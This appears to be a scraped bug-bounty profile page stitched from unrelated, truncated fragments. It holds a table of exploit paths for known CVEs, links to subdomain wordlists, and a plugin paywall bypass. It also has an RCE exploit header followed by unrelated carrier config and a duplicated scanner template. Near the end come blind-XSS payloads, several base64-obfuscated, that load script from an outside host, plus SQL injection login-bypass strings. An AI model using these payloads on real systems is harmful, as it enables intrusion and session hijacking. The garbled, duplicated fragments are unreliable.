Halim Jabbes hxlxmjxbbxs

Exploit/description	Path
Microsoft Office Online Server SSRF (relay)	/op/view.aspx
CVE-2017-11317 CVE-2019-18935	/Telerik.Web.Ui.WebResource.axd?type=rau
CVE-2017-11317 CVE-2019-18935	/Telerik.Web.UI.DialogHandler.aspx
CVE-2020-17519	/jobmanager/logs/
CVE-2017-7615	/verify.php?id=1&confirm_hash=
CVE-2018-1000130	/jolokia
CVE-2018-1000130	/actuator/jolokia
leak	/actuator/env

⏳🔺33 Million Subdomain Wordlist🔻🧱🔨👀

https://mega.nz/file/UsJXzITR#TMIFTXnW1zABHfZUIKMPMvA-c8UvzGWeAd4mg4gGCtQ

cmd@fb:/tmp|❯ wc -l 33m-subdomain-wordlist.txt
 33927885 33m-subdomain-wordlist.txt

🚨🔺15 Million Subdomain Wordlist🔻 🧱🔨👀

https://mega.nz/file/BtIh2KaZ#zI1aZgAdHYdBfvKC5G8bwXwfFG11Gx0CW1zLhc0weC8

All-in-One WP Migration Restore From Server (without pro version)

If you don't want to pay for the PRO version of this plugin, and you want to use the "Restore from Server" functionally that was present in the version 6.77, follow the instructions below:

Open the js file: wp-content/plugins/all-in-one-wp-migration/lib/view/assets/javascript/backups.min.js
On line 1208, replace the code below:

$('.ai1wm-backup-restore').click(function (e) {

Description

This is a simple guide to perform javascript recon in the bugbounty

Steps

The first step is to collect possibly several javascript files (more files = more paths,parameters -> more vulns)

	# Exploit Title: Mobile Mouse 3.6.0.4 Remote Code Execution
	# Date: May 28, 2024
	# Exploit Edited: Halim Jabbes
	# Exploit Author: Chokri Hammedi
	# Vendor Homepage: https://mobilemouse.com/
	# Software Link: https://www.mobilemouse.com/downloads/setup.exe
	# Version: 3.6.0.4
	# Tested on: Microsoft Windows NT 10.0.19045.0

	#!/usr/bin/env python3

	config:
	from_address: [email protected]

	carriers:
	alltel:
	name: Alltel
	value: @message.alltel.com
	ameritech:
	name: Ameritech
	value: @paging.acswireless.com

	id: CVE-2023-36845

	info:
	name: Juniper Networks Junos OS PHP External Variable Modification Vulnerability
	author: hxlxmj
	severity: medium
	description: \|
	A PHP External Variable Modification vulnerability in J-Web of Juniper Networks Junos OS on EX Series and SRX Series allows an unauthenticated, network-based attacker to control certain environments variables.
	reference:
	- https://nvd.nist.gov/vuln/detail/CVE-2023-36845

	id: CVE-2023-36845

	info:
	name: Juniper Networks Junos OS PHP External Variable Modification Vulnerability
	author: hxlxmj
	severity: medium
	description: \|
	A PHP External Variable Modification vulnerability in J-Web of Juniper Networks Junos OS on EX Series and SRX Series allows an unauthenticated, network-based attacker to control certain environments variables.
	reference:
	- https://nvd.nist.gov/vuln/detail/CVE-2023-36845

	"><script src="https://js.rip/t9eoip8zws"></script>
	javascript:eval('var a=document.createElement(\'script\');a.src=\'https://js.rip/t9eoip8zws\';document.body.appendChild(a)')
	"><input onfocus=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vanMucmlwL3Q5ZW9pcDh6d3MiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 autofocus>
	"><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vanMucmlwL3Q5ZW9pcDh6d3MiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 onerror=eval(atob(this.id))>
	"><video><source onerror=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vanMucmlwL3Q5ZW9pcDh6d3MiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7>
	"><iframe srcdoc="<script>var a=parent.document.createElement("scr&#

	or 1=1
	or 1=1--
	or 1=1#
	or 1=1/*
	admin' --
	admin' #
	admin'/*
	admin' or '1'='1
	admin' or '1'='1'--
	admin' or '1'='1'#